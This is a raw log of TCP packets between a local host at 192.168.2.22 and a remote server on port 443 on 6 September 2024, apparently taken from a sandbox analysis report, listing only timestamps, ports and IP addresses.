Sep 6, 2024 11:26:03.209716082 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.221661091 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.221713066 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.222079039 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.222117901 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.222141027 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.222146034 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.222157955 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.222158909 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.222198009 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.222199917 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.222208977 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.222248077 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.222347975 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.222810984 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.222868919 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.222976923 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.223011017 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.223023891 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.223031044 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.223047972 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.223947048 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.223989010 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.224000931 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.224006891 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.224024057 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.224029064 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.224061012 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.224083900 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.224092007 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.224107027 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.224214077 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.224761963 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.224819899 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.224931002 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.224967957 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.224992037 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.224997044 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.225007057 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.225016117 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.225039959 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.225044966 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.225115061 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.225995064 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.226032972 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.226051092 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.226059914 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.226072073 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.226073027 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.226118088 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.226125956 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.227227926 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.227271080 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.227277040 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.227286100 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.227314949 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.251247883 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.251285076 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.251332045 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.251354933 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.251379013 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.270226955 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.270261049 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.270302057 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.270309925 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.270333052 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.292421103 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.292476892 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.292493105 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.292540073 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.292572021 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.292596102 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.292603016 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.292620897 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.292881012 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.292916059 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.292939901 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.292948008 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.292969942 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.293040991 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.308419943 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.308458090 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.308485985 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.308491945 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.308505058 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.308551073 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.308784962 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.308816910 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.308834076 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.308840036 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.308855057 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.309204102 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.309250116 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.309257984 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.309356928 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.309499979 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.309535980 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.309547901 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.309554100 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.309592009 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.310235977 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.310271978 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.310301065 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.310308933 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.310321093 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.310328960 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.310349941 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.310355902 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.310365915 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.310394049 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.310491085 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.311191082 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.311239004 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.311243057 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.311249018 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.311268091 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.311283112 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.311290026 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.311305046 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.311338902 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.312105894 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.312154055 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.312268972 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.312303066 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.312311888 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.312318087 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.312333107 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.312345982 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.312378883 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.312386990 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.313218117 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.313249111 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.313262939 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.313271046 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.313296080 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.337791920 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.337862015 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.337868929 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.337930918 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.337990046 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.337996006 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.338057995 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.338090897 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.338114023 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.338119984 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.338135958 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.338294029 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.356843948 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.356897116 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.357033968 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.357076883 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.379247904 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.379281044 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.379309893 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.379309893 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.379319906 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.379532099 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.379574060 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.379584074 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.379590034 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.379606009 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.395201921 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.395237923 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.395247936 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.395260096 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.395283937 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.395479918 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.395522118 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.395534039 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.395539999 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.395560980 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.395570040 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.395596027 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.395601988 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.396496058 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.396533966 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.396547079 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.396554947 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.396565914 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.396974087 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.397005081 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.397022009 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.397027016 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.397041082 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.397041082 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.397078991 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.397085905 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.397752047 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.397789001 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.397798061 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.397804976 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.397824049 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.397838116 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.397886038 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.397893906 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.398696899 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.398732901 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.398742914 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.398749113 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.398770094 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.398772955 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.398807049 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.398813009 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.398818016 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.398848057 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.398900986 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.399620056 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.399662971 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.399667978 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.399672985 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.399701118 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.399704933 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.399712086 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.399746895 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.400537968 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.400568962 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.400588036 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.400594950 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.400605917 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.425008059 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.425051928 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.425060034 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.425066948 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.425087929 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.425091028 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.425122976 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.425131083 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.425137043 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.425163031 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.425210953 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.466504097 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.466542006 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.466553926 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.466561079 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.466586113 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.466713905 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.466752052 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.466764927 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.466770887 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.466789961 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.466804981 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.466851950 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.466857910 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.466871977 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.482194901 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.482249975 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.482264996 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.482271910 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.482295036 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.482317924 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.482348919 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.482355118 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.482362986 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.482399940 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.482465029 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.482604027 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.482636929 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.482645035 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.482650995 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.482681990 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.482918978 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.482973099 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.483032942 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.483062029 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.483077049 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.483083010 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.483097076 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.483340979 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.483381987 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.483387947 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.483478069 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.483515978 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.483522892 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.483532906 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.483625889 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.483633041 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.483941078 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.483984947 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.483992100 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484003067 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484040976 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.484046936 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484162092 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484206915 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484210014 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.484217882 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484247923 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.484252930 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484261990 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484292030 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.484292030 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484302044 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484329939 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.484803915 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484858036 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.484936953 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.484988928 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.485044956 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.485079050 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.485085964 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.485091925 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.485116959 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.485188007 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.511502028 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.511555910 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.511655092 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.511701107 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.511725903 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.511787891 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.511801958 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.511843920 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.553244114 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.553293943 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.553546906 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.553600073 CEST  49162  443    192.168.2.22   207.241.224.2
Sep 6, 2024 11:26:03.553647041 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.553680897 CEST  443    49162  207.241.224.2  192.168.2.22
Sep 6, 2024 11:26:03.553692102 CEST  49162  443    192.168.2.22   207.241.224.2
                          Sep 6, 2024 11:26:03.553699017 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.553715944 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.553715944 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.553750038 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.553755045 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.553765059 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.553797007 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.568952084 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.568985939 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.569005966 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.569010973 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.569024086 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.569091082 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.569128990 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:03.569135904 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:03.569147110 CEST44349162207.241.224.2192.168.2.22
